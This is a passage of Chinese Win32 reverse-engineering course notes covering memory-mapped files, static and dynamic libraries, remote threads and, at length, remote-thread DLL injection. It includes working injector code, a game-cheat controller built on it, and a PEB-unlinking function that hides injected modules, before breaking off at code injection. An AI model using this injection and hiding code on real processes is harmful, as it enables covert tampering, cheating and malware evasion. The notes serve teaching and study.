if(hMapFile == NULL) {
21
printf("CreateFileMapping failed: %d \n", GetLastError());
22
return 0;
23
}
24
25
// 3. 物理页映射到虚拟内存
26
lpAddr = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
27
28
// 4. 读取文件
29
// DWORD dwTest1 = *(LPDWORD)lpAddr; // 读取最开始的4字节
30
// printf("dwTest1: %x \n", dwTest1);
31
// 5. 写文件
32
*(LPDWORD)lpAddr = 0x41414142;
33
FlushViewOfFile(((LPDWORD)lpAddr), 4);
34
printf("Process A Write");
35
getchar();
36
// 6. 关闭资源
37
UnmapViewOfFile(lpAddr);
38
CloseHandle(hFile);
39
CloseHandle(hMapFile);
40
return 0;
41
}
42
滴水逆向课程笔记 – Win32
内存映射文件 – 119
分别使用getchar函数挂住了运行,A进程写入0x41414142,B进程也成功读取到了这个值:
#define MAPPINGNAME "Share File"
1
2
DWORD MappingFile(LPSTR lpcFile) {
3
HANDLE hMapFile;
4
LPVOID lpAddr;
5
6
// 1. 打开FileMapping对象
7
/*
8
OpenFileMapping 函数语法格式:
9
HANDLE OpenFileMapping(
10
DWORD dwDesiredAccess, // access mode 访问模式
11
BOOL bInheritHandle, // inherit flag 继承标识,为真则表示这个可以被新进程继承,为假反之
12
LPCTSTR lpName // object name 对象名称
13
);
14
*/
15
hMapFile = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, MAPPINGNAME);
16
17
// 2. 物理页映射到虚拟内存
18
lpAddr = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
19
20
// 3. 读取文件
21
DWORD dwTest1 = *(LPDWORD)lpAddr; // 读取最开始的4字节
22
printf("dwTest1: %x \n", dwTest1);
23
// 4. 写文件
24
// *(LPDWORD)lpAddr = 0x41414142;
25
printf("Process B Read");
26
getchar();
27
// 5. 关闭资源
28
UnmapViewOfFile(lpAddr);
29
CloseHandle(hMapFile);
30
return 0;
31
}
32
滴水逆向课程笔记 – Win32
内存映射文件 – 120
23.4 内存映射文件之写拷贝
我们知道了内存映射文件可以共享,但是这样也有弊端,如下图所示,实际上我们程序调用的user32.dll这类dll
文件,也是通过这种方式进行调用的,如果我们进场A修改了某个DLL,就会导致进程B出问题。
为了解决这种隐患,我们可以使用写拷贝的方式来处理。
写拷贝的实现就是MapViewOfFile函数中的第二个参数值为FILE_MAP_COPY,它的意思表示当你在写的时候进
行拷贝。
当我们设置为该熟悉时,则多进程之间读取的是同一块物理页,但是当进程A写入的时候则会将这份物理页拷
贝为一个新的物理页进行写:
滴水逆向课程笔记 – Win32
内存映射文件 – 121
写拷贝属性时候,写入时并不会影响原本的文件内容。
滴水逆向课程笔记 – Win32
静态链接库 – 122
24 静态链接库
软件随着更迭会越来越复杂,包含的功能会很多,一个大型软件参与开发的人会非常多,因为不可能一个把所
有事情干了,这样就会把软件分为多个模块,每个模块有对应的人去写,静态链接库就是软件模块化的一种解
决方案。
24.1 编写静态链接库文件
在VC6中创建静态链接库项目:
创建项目A,然后新建A.cpp和A.h,在A.h中声明一个add方法,在A.cpp中实现该方法:
滴水逆向课程笔记 – Win32
静态链接库 – 123
编译一下,在项目目录的Debug目录下会有一个A.lib文件,这就是我们的静态链接库:
滴水逆向课程笔记 – Win32
静态链接库 – 124
如果我们需要给别人用的话那就需要A.lib + A.h这个头文件一起给别人。
24.2 静态链接库的使用
静态链接库的使用有两种方法:
24.2.1 项目根目录
第一种方法:将生成的.h与.lib文件复制到项目根目录,然后在代码中引用:
#include "xxxx.h"
1
#pragma comment(lib, "xxxx.lib")
2
滴水逆向课程笔记 – Win32
静态链接库 – 125
•
•
24.2.2 VC6安装目录
第二种方法:将xxxx.h与xxxx.lib文件复制到VC6安装目录,与库文件放在一起,然后在工程->设置->连接->对象/
库模块中添加xxxx.lib,最后就可以像使用C语言库一样使用它了
头文件路径:C:\Program Files\Microsoft Visual Studio\VC98\Include
静态链接库路径:C:\Program Files\Microsoft Visual Studio\VC98\Lib
滴水逆向课程笔记 – Win32
静态链接库 – 126
在编辑框中写入A.lib,多个lib文件以空格隔开:
24.3 静态链接库的缺点
第一个:使用静态链接生成的可执行文件体积较大,例如我们从汇编层面来看,是根本无法区分哪个是静态库
中的代码的:
同时我们也了解了静态链接库的本质,那就是把你想要调用的接口(函数)直接写入到你的程序中。
滴水逆向课程笔记 – Win32
静态链接库 – 127
第二个:包含相同的公共代码,造成浪费,假设我们在多个项目中使用同一个静态链接库,其实也就表示相同
的代码复制多份。
滴水逆向课程笔记 – Win32
动态链接库 – 128
25 动态链接库
动态链接库弥补了静态链接库的两个缺点,动态链接库(Dynamic Link Library,缩写为DLL),是微软公司在
微软Windows操作系统中对共享函数库概念的一种实现方式,这些库函数的文件扩展名称为:.dll、.ocx(包含
ActiveX控制的库)。
25.1 创建动态链接库
25.1.1 extern的方式
VC6创建项目:
与静态链接库的创建方式一样,我们创建一个新的类MyDLL,这样就会自动创建MyDLL.h和MyDLL.cpp:
滴水逆向课程笔记 – Win32
动态链接库 – 129
在头文件MyDLL.h中我们要声明接口(函数),需要使用固定格式来声明而不能像静态链接库那样直接使用,
格式如下:
在MyDLL.cpp中实现方法,需要在开头写上一致的调用约定:
extern "C" _declspec(dllexport) 调用约定 返回类型 函数名 (参数列表);
1
滴水逆向课程笔记 – Win32
动态链接库 – 130
编译后在Debug目录就会生成B.dll文件:
在这里我们可以使用LordPE来查看我们这个DLL文件的导出表(涉及中级班课程暂时可以略过),我们只要知
道在这个导出表中有这个DLL声明的函数:
可以很清楚的看见我们的函数名称变成了_add@8。
滴水逆向课程笔记 – Win32
动态链接库 – 131
25.1.2 使用.DEF文件
我们可以在项目中创建一个文件扩展名为.def的文件,在该文件中使用如下格式来声明:
按照这种方式修改如下:
头文件:
CPP文件:
DEF文件:
然后编译,用LordPE打开查看一下函数名称就会发现其没有了@xxx这样的格式而是我们定义什么样就是什么
样:
EXPORTS
1
函数名 @编号 // 有编号,也有名称
2
函数名 @编号 NONAME // 有编号,没有名称
3
滴水逆向课程笔记 – Win32
动态链接库 – 132
这样做的好处就是:可以很直观的看见函数名,并且在应用层面可以达到隐藏的目的。
25.2 使用动态链接库
使用动态链接库的步骤比较繁琐,一共有如下几个步骤:
滴水逆向课程笔记 – Win32
动态链接库 – 133
执行结果如下图:
// 将DLL文件复制到项目目录下
1
2
// 步骤1:定义函数指针,如:
3
typedef int (*lpAdd)(int,int);
4
5
// 步骤2:声明函数指针变量,如:
6
lpAdd myAdd;
7
8
// 步骤3:动态加载dll到内存中,如:
9
// LoadLibrary函数会先从当前目录寻找,然后在系统目录寻找
10
HINSTANCE hModule = LoadLibrary("B.dll");
11
12
// 步骤4:获取函数地址,如:
13
myAdd = (lpAdd)GetProcAddress(hModule, "add");
14
15
// 步骤5:调用函数,如:
16
int a = myAdd(10,2);
17
18
// 步骤6:释放动态链接库,如:
19
FreeLibrary(hModule);
20
滴水逆向课程笔记 – Win32
隐式链接 – 134
1.
2.
3.
26 隐式链接
之前我们调用动态链接库(DLL文件)使用的方式实际上是显式链接,它的优点是非常灵活,缺点就是使用起
来非常麻烦,步骤很繁琐。
本章节我们来学习隐式链接,通过隐式链接我们只需要一次配置,之后就会非常的方便。
26.1 隐式链接
隐式链接有这几个步骤:
将.dll和.lib放到项目目录下
将 #pragma comment(lib, "DLL名.lib") 添加到调用文件
加入函数声明
函数声明格式如下:
注意:在课程中给出的_declspec是有两个下划线的,经过查询之后实际上一个下划线和两个下划线是等价的。
注意,如果你创建动态链接库的方式是extern的方式,那么在第三步加入函数声明时就应该按照extern的格式
来:
_declspec(dllimport) _调用约定 返回值 函数名称 (函数参数列表);
1
extern "C" _declspec(dllexport) 调用约定 返回类型 函数名 (参数列表);
1
extern "C" _declspec(dllimport) 调用约定 返回类型 函数名 (参数列表);
2
滴水逆向课程笔记 – Win32
隐式链接 – 135
26.2 隐式链接的实现
使用隐式链接,编译器会将链接的DLL文件存放到导入表中:
我们可以使用LordPE来查看一下:
并且它可以详细的记录使用了DLL中的哪些函数:
滴水逆向课程笔记 – Win32
隐式链接 – 136
26.3 DLL的优点
DLL的优点如下图所示,DLL只在内存中加载一份,修改的时候就是写拷贝原理,不会影响别的进程使用DLL以
及不会影响DLL本身:
26.4 DllMain函数
我们的控制台程序入口是Main函数,而DLL文件的入口函数是DllMain函数(DllMain函数可能会执行很多次,
不像我们的Main函数只执行一次),其语法格式如下:
BOOL WINAPI DllMain(
1
HINSTANCE hinstDLL, // handle to the DLL module DLL模块的句柄,当前DLL被加载到什么位置
2
DWORD fdwReason, // reason for calling function DLL被调用的原因,有4种情况:DLL_PROCESS_ATTACH
(当某个进程第一次执行LoadLibrary)、DLL_PROCESS_DETACH(当某个进程释放了DLL)、DLL_THREAD_ATTACH(当某个进
程的其他线程再次执行LoadLibrary)、DLL_THREAD_DETACH(当某个进程的其他线程释放了DLL)
3
LPVOID lpvReserved // reserved
4
);
5
滴水逆向课程笔记 – Win32
远程线程 – 137
27 远程线程
27.1 线程的概念
线程是附属在进程上的执行实体,是代码的执行流程;代码必须通过线程才能执行。
27.2 创建远程线程
创建远程线程的函数是CreateRemoteThread,其语法格式如下:
CreateThread函数是在当前进程中创建线程,而CreateRemoteThread函数是允许在其他进程中创建线程,所
以远程线程就可以理解为是非本进程中的线程。
首先创建A进程,代码如下:
进程B写了一个远程线程创建的代码:
HANDLE CreateRemoteThread(
1
HANDLE hProcess, // handle to process 输入类型,进程句柄
2
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD 输入类型,安全属性,包含安全描述符
3
SIZE_T dwStackSize, // initial stack size 输入类型,堆大小
4
LPTHREAD_START_ROUTINE lpStartAddress, // thread function 输入类型,线程函数,线程函数地址应该是在别
的进程中存在的
5
LPVOID lpParameter, // thread argument 输入类型,线程参数
6
DWORD dwCreationFlags, // creation option 输入类型,创建设置
7
LPDWORD lpThreadId // thread identifier 输出类型,线程id
8
);
9
void Fun() {
1
for(int i = 0; i <= 5; i++) {
2
printf("Fun running... \n");
3
Sleep(1000);
4
}
5
}
6
7
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
8
Fun();
9
return 0;
10
}
11
12
int main(int argc, char* argv[]) {
13
14
HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
15
16
CloseHandle(hThread);
17
18
getchar();
19
return 0;
20
}
21
滴水逆向课程笔记 – Win32
远程线程 – 138
函数MyCreateRemoteThread传入2个参数,一个是进程ID,一个是线程函数地址。
进程ID通过任务管理器查看:
BOOL MyCreateRemoteThread(DWORD dwProcessId, DWORD dwProcessAddr) {
1
DWORD dwThreadId;
2
HANDLE hProcess;
3
HANDLE hThread;
4
// 1. 获取进程句柄
5
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
6
// 判断OpenProcess是否执行成功
7
if(hProcess == NULL) {
8
OutputDebugString("OpenProcess failed! \n");
9
return FALSE;
10
}
11
// 2. 创建远程线程
12
hThread = CreateRemoteThread(
13
hProcess, // handle to process
14
NULL, // SD
15
0, // initial stack size
16
(LPTHREAD_START_ROUTINE)dwProcessAddr, // thread function
17
NULL, // thread argument
18
0, // creation option
19
&dwThreadId // thread identifier
20
);
21
// 判断CreateRemoteThread是否执行成功
22
if(hThread == NULL) {
23
OutputDebugString("CreateRemoteThread failed! \n");
24
CloseHandle(hProcess);
25
return FALSE;
26
}
27
28
// 3. 关闭
29
CloseHandle(hThread);
30
CloseHandle(hProcess);
31
32
// 返回
33
return TRUE;
34
}
35
滴水逆向课程笔记 – Win32
远程线程 – 139
我们在进程A的代码下断点找到线程函数地址:
然后将对应值填入即可远程创建线程:
滴水逆向课程笔记 – Win32
远程线程 – 140
滴水逆向课程笔记 – Win32
远程线程注入 – 141
28 远程线程注入
之前我们是远程创建线程,调用的也是人家自己的线程函数,而如果我们想要创建远程线程调用自己定义的线
程函数就需要使用远程线程注入技术。
28.1 什么是注入
所谓注入就是在第三方进程不知道或者不允许的情况下将模块或者代码写入对方进程空间,并设法执行的技
术。
在安全领域,“注入”是非常重要的一种技术手段,注入与反注入也一直处于不断变化的,而且也愈来愈激烈的
对抗当中。
已知的注入方式:
远程线程注入、APC注入、消息钩子注入、注册表注入、导入表注入、输入法注入等等。
28.2 远程线程注入的流程
远程线程注入的思路就是在进程A中创建线程,将线程函数指向LoadLibrary函数。
那么为什么可以这样呢?这是因为我们执行远程线程函数满足返回值是4字节,一个参数是4字节即可
(ThreadProc就是这样的条件):
我们再来看一下LoadLibrary函数的语法格式:
我们可以跟进(F12)一下HMODULE和LPCTSTR这两个宏的定义,就会发现其实都是4字节宽度。
具体实现步骤如下图所示:
HMODULE LoadLibrary(
1
LPCTSTR lpFileName // file name of module
2
);
3
滴水逆向课程笔记 – Win32
远程线程注入 – 142
28.3 如何执行代码
DLL文件,在DLL文件入口函数判断并创建线程:
文件我们用之前写的Test1.exe即可,将编译好的DLL和Test1.exe放在同一个目录并打开Test1.exe。
注入实现:
// B.cpp : Defines the entry point for the DLL application.
1
//
2
3
#include "stdafx.h"
4
5
DWORD WINAPI ThreadProc(LPVOID lpParaneter) {
6
for (;;) {
7
Sleep(1000);
8
printf("DLL RUNNING...");
9
}
10
}
11
12
BOOL APIENTRY DllMain( HANDLE hModule,
13
DWORD ul_reason_for_call,
14
LPVOID lpReserved
15
)
16
{ // 当进程执行LoadLibrary时创建一个线程,执行ThreadProc线程
17
switch (ul_reason_for_call) {
18
case DLL_PROCESS_ATTACH:
19
CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
20
break;
21
}
22
return TRUE;
23
}
24
滴水逆向课程笔记 – Win32
远程线程注入 – 143
// Test.cpp : Defines the entry point for the console application.
1
//
2
3
#include "StdAfx.h"
4
5
// LoadDll需要两个参数一个参数是进程ID,一个是DLL文件的路径
6
BOOL LoadDll(DWORD dwProcessID, char* szDllPathName) {
7
8
BOOL bRet;
9
HANDLE hProcess;
10
HANDLE hThread;
11
DWORD dwLength;
12
DWORD dwLoadAddr;
13
LPVOID lpAllocAddr;
14
DWORD dwThreadID;
15
HMODULE hModule;
16
17
bRet = 0;
18
dwLoadAddr = 0;
19
hProcess = 0;
20
21
// 1. 获取进程句柄
22
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
23
if (hProcess == NULL) {
24
OutputDebugString("OpenProcess failed! \n");
25
return FALSE;
26
}
27
28
// 2. 获取DLL文件路径的长度,并在最后+1,因为要加上0结尾的长度
29
dwLength = strlen(szDllPathName) + 1;
30
31
// 3. 在目标进程分配内存
32
lpAllocAddr = VirtualAllocEx(hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);
33
if (lpAllocAddr == NULL) {
34
OutputDebugString("VirtualAllocEx failed! \n");
35
CloseHandle(hProcess);
36
return FALSE;
37
}
38
39
// 4. 拷贝DLL路径名字到目标进程的内存
40
bRet = WriteProcessMemory(hProcess, lpAllocAddr, szDllPathName, dwLength, NULL);
41
if (!bRet) {
42
OutputDebugString("WriteProcessMemory failed! \n");
43
CloseHandle(hProcess);
44
return FALSE;
45
}
46
47
// 5. 获取模块句柄
48
// LoadLibrary这个函数是在kernel32.dll这个模块中的,所以需要现货区kernel32.dll这个模块的句柄
49
hModule = GetModuleHandle("kernel32.dll");
50
if (!hModule) {
51
OutputDebugString("GetModuleHandle failed! \n");
52
CloseHandle(hProcess);
53
return FALSE;
54
}
55
滴水逆向课程笔记 – Win32
远程线程注入 – 144
注入成功:
56
// 6. 获取LoadLibraryA函数地址
57
dwLoadAddr = (DWORD)GetProcAddress(hModule, "LoadLibraryA");
58
if (!dwLoadAddr){
59
OutputDebugString("GetProcAddress failed! \n");
60
CloseHandle(hModule);
61
CloseHandle(hProcess);
62
return FALSE;
63
}
64
65
// 7. 创建远程线程,加载DLL
66
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)dwLoadAddr,
lpAllocAddr, 0, &dwThreadID);
67
if (!hThread){
68
OutputDebugString("CreateRemoteThread failed! \n");
69
CloseHandle(hModule);
70
CloseHandle(hProcess);
71
return FALSE;
72
}
73
74
// 8. 关闭进程句柄
75
CloseHandle(hThread);
76
CloseHandle(hProcess);
77
78
return TRUE;
79
}
80
81
int main(int argc, char* argv[]) {
82
83
LoadDll(384, "C:\\Documents and Settings\\Administrator\\桌面\\test\\B.dll");
84
getchar();
85
return 0;
86
}
87
滴水逆向课程笔记 – Win32
远程线程注入 – 145
滴水逆向课程笔记 – Win32
进程间通信 – 146
29 进程间通信
同一台机器上进程之间的通信虽然有很多种方法,但其本质就是共享内存。
29.1 举例说明
假设现在我们进程A的代码是这样的:
滴水逆向课程笔记 – Win32
进程间通信 – 147
这就是获取输入的字符来攻击、打坐、加血的小程序,我们想要自动化的控制这个程序而不是自己输入该怎么
办?这时候就需要使用平时中大家常提的外挂技术,在这里实际上就是远程线程注入,通过进程B控制进程A的
执行流程。
如下是DLL文件的代码:
void Attack()
1
{
2
printf("**********攻击********** \n");
3
return;
4
}
5
6
void Rest()
7
{
8
printf("**********打坐********** \n");
9
return;
10
}
11
12
void Blood()
13
{
14
printf("**********加血********** \n");
15
return;
16
}
17
18
int main(int argc, char* argv[]) {
19
char cGetchar;
20
printf("**********GAME BEGIN********** \n");
21
while(1) {
22
cGetchar = getchar();
23
switch(cGetchar) {
24
case 'A':
25
{
26
Attack();
27
break;
28
}
29
case 'R':
30
{
31
Rest();
32
break;
33
}
34
case 'B':
35
{
36
Blood();
37
break;
38
}
39
}
40
}
41
return 0;
42
}
43
滴水逆向课程笔记 – Win32
进程间通信 – 148
// B.cpp : Defines the entry point for the DLL application.
1
//
2
3
#include "stdafx.h"
4
5
#define _MAP_ "共享内存"
6
7
// 首先需要获取函数的地址
8
#define ATTACK 0x00401030
9
#define REST 0x00401080
10
#define BLOOD 0x004010D0
11
12
HANDLE g_hModule;
13
HANDLE g_hMapFile;
14
LPTSTR lpBuffer;
15
DWORD dwType;
16
17
DWORD WINAPI ThreadProc(LPVOID lpParameter)
18
{
19
dwType = 0;
20
g_hMapFile = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, _MAP_);
21
22
if (g_hMapFile == NULL)
23
{
24
printf("OpenFileMapping failed: %d", GetLastError());
25
return 0;
26
}
27
28
//映射内存
29
lpBuffer = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUFSIZ);
30
31
for (;;)
32
{
33
if (lpBuffer != NULL)
34
{
35
// 读取数据
36
CopyMemory(&dwType, lpBuffer, 4);
37
}
38
39
if (dwType == 1)
40
{
41
// 攻击
42
__asm {
43
mov eax, ATTACK
44
call eax
45
}
46
dwType == 0;
47
CopyMemory(&dwType, lpBuffer, 4);
48
}
49
50
if (dwType == 2)
51
{
52
// 打坐
53
__asm {
54
mov eax, REST
55
滴水逆向课程笔记 – Win32
进程间通信 – 149
需要注意的是我们首先需要获取函数的地址,这个我们可以通过VC6反汇编来寻找:
call eax
56
}
57
dwType == 0;
58
CopyMemory(&dwType, lpBuffer, 4);
59
}
60
61
if (dwType == 3)
62
{
63
// 加血
64
__asm {
65
mov eax, BLOOD
66
call eax
67
}
68
dwType == 0;
69
CopyMemory(&dwType, lpBuffer, 4);
70
}
71
72
if (dwType == 4)
73
{
74
//卸载自身并退出
75
FreeLibraryAndExitThread((HMODULE)g_hModule, 0);
76
}
77
78
Sleep(500);
79
}
80
81
return 0;
82
}
83
84
BOOL APIENTRY DllMain( HMODULE hModule,
85
DWORD ul_reason_for_call,
86
LPVOID lpReserved
87
)
88
{
89
switch (ul_reason_for_call) {
90
case DLL_PROCESS_ATTACH:
91
{
92
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadProc, NULL, 0, NULL);
93
break;
94
}
95
}
96
return TRUE;
97
}
98
滴水逆向课程笔记 – Win32
进程间通信 – 150
编译好DLL之后,我们需要一个进程B来控制进程A,代码如下:
滴水逆向课程笔记 – Win32
进程间通信 – 151
#include <tlhelp32.h>
1
#include <stdio.h>
2
#include <windows.h>
3
4
#define _MAP_ "共享内存"
5
6
HANDLE g_hMapFile;
7
LPTSTR lpBuffer;
8
9
BOOL LoadDll(DWORD dwProcessID, char* szDllPathName) {
10
11
BOOL bRet;
12
HANDLE hProcess;
13
HANDLE hThread;
14
DWORD dwLength;
15
DWORD dwLoadAddr;
16
LPVOID lpAllocAddr;
17
DWORD dwThreadID;
18
HMODULE hModule;
19
20
bRet = 0;
21
dwLoadAddr = 0;
22
hProcess = 0;
23
24
// 1. 获取进程句柄
25
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
26
if (hProcess == NULL) {
27
OutputDebugString("OpenProcess failed! \n");
28
return FALSE;
29
}
30
31
// 2. 获取DLL文件路径的长度,并在最后+1,因为要加上0结尾的长度
32
dwLength = strlen(szDllPathName) + 1;
33
34
// 3. 在目标进程分配内存
35
lpAllocAddr = VirtualAllocEx(hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);
36
if (lpAllocAddr == NULL) {
37
OutputDebugString("VirtualAllocEx failed! \n");
38
CloseHandle(hProcess);
39
return FALSE;
40
}
41
42
// 4. 拷贝DLL路径名字到目标进程的内存
43
bRet = WriteProcessMemory(hProcess, lpAllocAddr, szDllPathName, dwLength, NULL);
44
if (!bRet) {
45
OutputDebugString("WriteProcessMemory failed! \n");
46
CloseHandle(hProcess);
47
return FALSE;
48
}
49
50
// 5. 获取模块句柄
51
// LoadLibrary这个函数是在kernel32.dll这个模块中的,所以需要现货区kernel32.dll这个模块的句柄
52
hModule = GetModuleHandle("kernel32.dll");
53
if (!hModule) {
54
OutputDebugString("GetModuleHandle failed! \n");
55
滴水逆向课程笔记 – Win32
进程间通信 – 152
CloseHandle(hProcess);
56
return FALSE;
57
}
58
59
// 6. 获取LoadLibraryA函数地址
60
dwLoadAddr = (DWORD)GetProcAddress(hModule, "LoadLibraryA");
61
if (!dwLoadAddr){
62
OutputDebugString("GetProcAddress failed! \n");
63
CloseHandle(hModule);
64
CloseHandle(hProcess);
65
return FALSE;
66
}
67
68
// 7. 创建远程线程,加载DLL
69
hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)dwLoadAddr,
lpAllocAddr, 0, &dwThreadID);
70
if (!hThread){
71
OutputDebugString("CreateRemoteThread failed! \n");
72
CloseHandle(hModule);
73
CloseHandle(hProcess);
74
return FALSE;
75
}
76
77
// 8. 关闭进程句柄
78
CloseHandle(hThread);
79
CloseHandle(hProcess);
80
81
return TRUE;
82
}
83
84
BOOL Init()
85
{
86
// 创建共享内存
87
g_hMapFile = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, 0x1000, _MAP_);
88
if (g_hMapFile == NULL)
89
{
90
printf("CreateFileMapping failed! \n");
91
return FALSE;
92
}
93
94
// 映射内存
95
lpBuffer = (LPTSTR)MapViewOfFile(g_hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, BUFSIZ);
96
if (lpBuffer == NULL)
97
{
98
printf("MapViewOfFile failed! \n");
99
return FALSE;
100
}
101
102
return TRUE;
103
}
104
105
// 根据进程名称获取进程ID
106
DWORD GetPID(char *szName)
107
{
108
HANDLE hProcessSnapShot = NULL;
109
PROCESSENTRY32 pe32 = {0};
110
滴水逆向课程笔记 – Win32
进程间通信 – 153
成功执行并控制了进程A:
111
hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112
if (hProcessSnapShot == (HANDLE)-1)
113
{
114
return 0;
115
}
116
117
pe32.dwSize = sizeof(PROCESSENTRY32);
118
if (Process32First(hProcessSnapShot, &pe32))
119
{
120
do {
121
if (!strcmp(szName, pe32.szExeFile)) {
122
return (int)pe32.th32ProcessID;
123
}
124
} while (Process32Next(hProcessSnapShot, &pe32));
125
}
126
else
127
{
128
CloseHandle(hProcessSnapShot);
129
}
130
return 0;
131
}
132
133
int main()
134
{
135
DWORD dwCtrlCode = 0;
136
// 指令队列
137
DWORD dwOrderList[10] = {1, 1, 2, 3, 3, 1, 2, 1, 3, 4};
138
139
printf("Are you ready? \n");
140
141
getchar();
142
143
if (Init()) {
144
LoadDll(GetPID("Test.exe"), (char*)"C:\\Documents and Settings\\Administrator\\桌面\\test\
\B.dll");
145
}
146
147
for (int i = 0; i < 10; i++)
148
{
149
dwCtrlCode = dwOrderList[i];
150
CopyMemory(lpBuffer, &dwCtrlCode, 4);
151
Sleep(2000);
152
}
153
154
getchar();
155
156
return 0;
157
}
158
滴水逆向课程笔记 – Win32
进程间通信 – 154
滴水逆向课程笔记 – Win32
模块隐藏 – 155
1.
2.
1.
2.
30 模块隐藏
之前我们了解了直接注入一个DLL到进程中,但是这样实际上是很难存活的,因为程序很容易就可以通过API来
获取当前加载的DLL模块,所以我们需要使用模块隐藏技术来隐藏自己需要注入的DLL模块。
30.1 模块隐藏之断链
API是通过什么将模块查询出来的?其实API都是从这几个结构体(结构体属于3环应用层)中查询出来的:
TEB(Thread Environment Block,线程环境块),它存放线程的相关信息,每一个线程都有自己的TEB信
息,FS:[0]即是当前线程的TEB。
PEB(Process Environment Block,进程环境块),它存放进程的相关信息,每个进程都有自己的PEB信
息,FS:[0x30]即当前进程的PEB。
如下图所示(只介绍与本章节相关的信息)
TEB第一个成员是一个结构体,这个结构体包含了当前线程栈栈底和当前线程栈的界限;TEB的020偏移
是一个结构体,其包含了两个成员,一个是当前线程所在进程的PID和当前线程自己的线程ID;
PEB的00c偏移是一个结构体,这个结构体包括模块链表,API函数遍历模块就是查看这个链表。
我们如何去获取这个TEB结构体呢?我们可以随便找一个EXE拖进DTDebug,然后来看一下FS寄存器(目前你
只需要知道TEB的地址就存储在FS寄存器中即可,具体细节在中级课程中):
滴水逆向课程笔记 – Win32
模块隐藏 – 156
我们可以在左下角使用dd 7FFDF000命令来查看TEB结构体:
滴水逆向课程笔记 – Win32
模块隐藏 – 157
FS寄存器中存储的就是当前正在使用的线程的TEB结构体的地址。
PEB结构体同理,我们只需要找到FS寄存器中存储地址的0x30偏移然后跟进即可:
滴水逆向课程笔记 – Win32
模块隐藏 – 158
滴水逆向课程笔记 – Win32
模块隐藏 – 159
我们之前已经了解到了API函数遍历模块就是查看PEB那个链表,所以我们要想办法让它在查询的时候断链。
30.1.1 断链实现代码
如下我们通过断链的方式实现了一个隐藏模块的函数:
滴水逆向课程笔记 – Win32
模块隐藏 – 160
我们可以调用隐藏kernel32.dll这个模块,然后用DTDebug来查看一下:
编译打开(不使用VC6打开)Test.exe然后使用DTDebug来Attach进程:
void HideModule(char* szModuleName) {
1
// 获取模块的句柄
2
HMODULE hMod = GetModuleHandle(szModuleName);
3
PLIST_ENTRY Head, Cur;
4
PPEB_LDR_DATA ldr;
5
PLDR_MODULE ldmod;
6
7
__asm {
8
mov eax, fs:[0x30] // 取PEB结构体
9
mov ecx, [eax + 0x0c] // 取PEB结构体的00c偏移的结构体,就是PEB_LDR_DATA
10
mov ldr, ecx // 将ecx给到ldr
11
}
12
// 获取正在加载的模块列表
13
Head = &(ldr->InLoadOrderModuleList);
14
//
15
Cur = Head->Flink;
16
do {
17
// 宏CONTAINING_RECORD根据结构体中某成员的地址来推算出该结构体整体的地址
18
ldmod = CONTAINING_RECORD(Cur, LDR_MODULE, InLoadOrderModuleList);
19
// 循环遍历,如果地址一致则表示找到对应模块来,就进行断链
20
if(hMod == ldmod->BaseAddress) {
21
// 断链原理很简单就是将属性交错替换
22
ldmod->InLoadOrderModuleList.Blink->Flink = ldmod->InLoadOrderModuleList.Flink;
23
ldmod->InLoadOrderModuleList.Flink->Blink = ldmod->InLoadOrderModuleList.Blink;
24
25
ldmod->InInitializationOrderModuleList.Blink->Flink = ldmod-
>InInitializationOrderModuleList.Flink;
26
ldmod->InInitializationOrderModuleList.Flink->Blink = ldmod-
>InInitializationOrderModuleList.Blink;
27
28
ldmod->InMemoryOrderModuleList.Blink->Flink = ldmod->InMemoryOrderModuleList.Flink;
29
ldmod->InMemoryOrderModuleList.Flink->Blink = ldmod->InMemoryOrderModuleList.Blink;
30
}
31
Cur = Cur->Flink;
32
} while (Head != Cur);
33
}
34
int main(int argc, char* argv[]) {
1
getchar();
2
HideModule("kernel32.dll");
3
getchar();
4
return 0;
5
}
6
滴水逆向课程笔记 – Win32
模块隐藏 – 161
此刻我们是可以看见kernel32.dll模块的,但是当我们回车一下再来看就消失了:
30.2 模块隐藏之PE指纹
首先我们来看某一个模块的PE指纹,这里就用ntdll.dll举例:
其地址是7c920000,我们在DTDebug中使用命令db 7c920000即可看到该模块的信息:
该模块开头两个字节是4D 5A,也就是MZ,当看见这两个字节后,在其位置向后找第64字节,发现是E0,那么
就从模块起始位置0x7c920000加0xE0,这样就成了0x7c9200E0,然后我们找到对应地址的两个字节为50 45,
也就是PE。
滴水逆向课程笔记 – Win32
模块隐藏 – 162
这就是一个PE指纹,如果能满足这一套流程则表示这是一个模块。
30.3 模块隐藏之VAD树
这里涉及内核知识,建议观看视频简单讲解。
滴水逆向课程笔记 – Win32
注入代码 – 163
1.
2.
31 注入代码
最好的隐藏是无模块注入,也就是代码注入,将我们想要执行的代码注入进去。
31.1 注入代码的思路
我们可以将自定义函数复制到目标进程中,这样目标进程就可以执行我们想要执行的代码了,这就是注入代码
的思路:
听起来很简单,但是其中有很多问题:
你要将自定义函数复制到目标进程中,你复制的东西本质是什么?
你复制过去就一定可以执行吗?前提条件是什么?
31.1.1 机器码
首先我们来解决一下第一个问题,我们之前通过VC6是可以查看反汇编代码的,而实际上一个程序能看见具体
的汇编代码吗?其实不可以,其表现形式应该是机器码,如下图所示左边是机器码,右边是机器码对应的汇编
